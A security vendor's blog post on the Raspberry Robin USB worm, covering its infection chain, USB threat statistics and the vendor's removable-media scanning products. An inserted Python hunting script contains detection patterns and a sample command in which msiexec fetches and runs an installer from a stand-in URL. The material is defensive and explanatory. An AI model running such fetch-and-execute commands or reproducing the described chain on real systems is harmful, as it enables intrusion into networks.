Solutions PT Blog

Hundreds of Networks Infected via USB Devices

Written by Tom Bohan | Aug 4, 2022 8:14:35 AM

A worm labelled Raspberry Robin has infected hundreds of Windows networks, as revealed by a private threat intelligence advisory from Microsoft.

The worm is reportedly being transmitted to networks via USB devices. To spread, the worm requires users to insert their USB device and then click a malicious .LNK file. After a user has done this, the worm can then use the Windows command prompt to launch an msiexec process and run a malicious file also present on the USB device.

A connection is then established with a command and control server using a short URL, and if successful, a number of malicious DLLs are downloaded and installed. The legitimate Windows utility odbcconf.exe is then used to execute the DLLs whilst the worm repeatedly attempts to connect to Tor network nodes. At least some of the command and control servers being used are thought to be infected QNAP NAS devices.
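The process chain described above (command prompt, then msiexec, then odbcconf.exe loading DLLs) can be hunted for in process-creation telemetry. The following is an added example, not code from this post or from Microsoft's advisory; the event field names (`host`, `image`, `parent_image`, `command_line`) and all sample events are constructed assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)   # remote URL in a command line
DLL_RE = re.compile(r"[^\s\"'{}]+\.dll\b", re.IGNORECASE)   # DLL reference in a command line

def classify(event):
    """Return a finding label for one process-creation event, or None."""
    image = basename(event["image"]).lower()
    parent = basename(event["parent_image"]).lower()
    cmdline = event["command_line"]
    # Stage 1: the command prompt starts msiexec against a remote URL.
    if image == "msiexec.exe" and parent == "cmd.exe" and URL_RE.search(cmdline):
        return "msiexec-remote-fetch"
    # Stage 2: odbcconf.exe is asked to load a DLL.
    if image == "odbcconf.exe" and DLL_RE.search(cmdline):
        return "odbcconf-dll-load"
    return None

def hunt(events):
    """Group findings per host; a host showing both stages is reported as 'chain'."""
    per_host = {}
    for ev in events:
        label = classify(ev)
        if label:
            per_host.setdefault(ev["host"], set()).add(label)
    return {h: ("chain" if len(s) == 2 else sorted(s)[0]) for h, s in per_host.items()}

# Constructed sample events; hosts, paths and the URL are fictional.
SAMPLE = [
    {"host": "ws-01", "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "msiexec /i http://short.example/abc"},
    {"host": "ws-01", "image": r"C:\Windows\System32\odbcconf.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"odbcconf.exe /a {regsvr C:\Users\Public\sample.dll}"},
    {"host": "ws-02", "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"msiexec /i C:\Installers\app.msi"},
    {"host": "ws-03", "image": r"C:\Windows\System32\odbcconf.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"odbcconf.exe /a {regsvr C:\Temp\driver.dll}"},
]

if __name__ == "__main__":
    print(hunt(SAMPLE))
```

Treat single-stage matches as hunting leads, since legitimate installers can also invoke these utilities; a host showing both stages warrants immediate review.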

Another disconcerting part of this story is that whoever successfully deployed Raspberry Robin has yet to make use of the infected Windows networks. The malware introduced by the worm is capable of bypassing Windows User Account Control (UAC) and has already proven it can use the utilities available to the OS. So, while nobody currently knows the goal of Raspberry Robin, the control it imposes over a network means new malware could be downloaded and deployed very quickly.

Microsoft has flagged Raspberry Robin as a high-risk campaign with good reason, and for now, there doesn't seem to be any mitigation process beyond not plugging suspicious USB devices into a Windows network. However, businesses where USB devices are a necessity, for example, those that require USBs to make changes and updates to their networks, may not be able to mitigate the risk of spreading Raspberry Robin and other malicious content from USBs to the network.

Further illustrating the continued threat of removable media, particularly to industrial control systems, is Honeywell’s 2021 Industrial Cybersecurity USB Threat Report. Data was collected from organizations in oil and gas, energy, chemical, water, aerospace and other sectors, across more than 60 countries in the Americas, Europe and Asia.

The report found that 37% of threats are specifically designed to utilize removable media. Compared to 19% in their 2020 report, this marks an increase of 18 percentage points. The report also found that 79% of all cyber threats originating from removable media can lead to critical business disruption in OT environments. In particular, 30% of all USB-based threats are designed solely for industrial use or associated with industrial cyber-attack campaigns.

A modest 9% have the sole purpose of installing additional payloads, and over 50% are designed to establish a permanent backdoor or remote access. According to the new data, a 30% increase in the use of USB devices in manufacturing facilities was also observed last year, showcasing OT’s growing reliance on removable media technology.

How to protect your network from USB threats

SolutionsPT provides a range of removable media protection solutions which scan and sanitize your devices prior to them being plugged into your network. Our solutions can block unscanned devices from connecting to your environment and can also detect zero-day and unknown threats that may be present on your removable media. This helps in meeting policies, regulations and standards surrounding removable media use within OT and at the same time ensures removable media will not cause a cyber incident and negatively impact your operations.
